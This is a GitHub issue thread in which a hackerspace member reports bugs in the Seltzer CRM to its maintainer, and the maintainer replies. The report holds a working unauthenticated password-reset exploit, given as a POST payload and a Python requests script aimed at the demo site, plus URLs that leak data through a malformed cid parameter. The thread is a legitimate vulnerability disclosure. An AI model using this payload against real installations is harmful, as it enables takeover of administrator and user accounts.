Closed altinukshini closed 6 years ago
Thanks for finding this! Can you give any more information on how this works? Is there a missing permissions check or is this somehow injecting data into the php $_SESSION variable?
Also, which hackerspace are you from? Hi!
On Tue, Feb 27, 2018 at 9:10 PM, Altin Ukshini notifications@github.com wrote:
cid is still not handled well from this issue (#241 https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a url with a string cid param can show a lot of unwanted data: http://demo.seltzercrm.org/?q=contact&cid=j or http://demo.seltzercrm.org/?q=contact&cid="2"
I'd like to credit a young kid at our hackerspace for figuring this out and breaking our crm :D. Unauthorized/unauthenticated users can change admin/any password by making a: POST request on: http://demo.seltzercrm.org/?q=contact&cid=1 with data: {'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}
You can try this simple python script:
import requests
headers = { 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0', 'Accept': 'application/json, text/javascript, /; q=0.01', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'X-Requested-With': 'XMLHttpRequest' }
session = requests.Session()
content = requests.post("http://demo.seltzercrm.org/index.php?q=contact&cid=1", data={'cid': 1, 'command': 'set_password', 'password': 'helloworld', 'confirm': 'helloworld', 'submitted':'Change+password'}, headers=headers)
print content
— You are receiving this because you are subscribed to this thread. Reply to this email directly, view it on GitHub https://github.com/elplatt/seltzer/issues/409, or mute the thread https://github.com/notifications/unsubscribe-auth/AAS0WEQaPhaay9QpXUmIowNy8yVKA-LSks5tZLWOgaJpZM4SV9NE .
-- Edward L. Platt https://elplatt.com | @elplatt | elplatt@social.coop
Tips for stopping email overload: https://hbr.org/2012/02/stop-email-overload-1
cid is still not handled well from this issue (https://github.com/elplatt/seltzer/issues/241). An authenticated user visiting a url with a string cid param can show a lot of unwanted data:
http://demo.seltzercrm.org/?q=contact&cid=j
orhttp://demo.seltzercrm.org/?q=contact&cid="2"
I'd like to credit a young kid at our hackerspace for figuring this out and breaking our crm :D. Unauthorized/unauthenticated users can change admin/any password by making a: POST request on:
http://demo.seltzercrm.org/?q=contact&cid=1
with data:{'cid': 1, 'command': 'set_password', 'password': 'lol123', 'confirm': 'lol123', 'submitted':'Change+password'}
You can try this simple python script: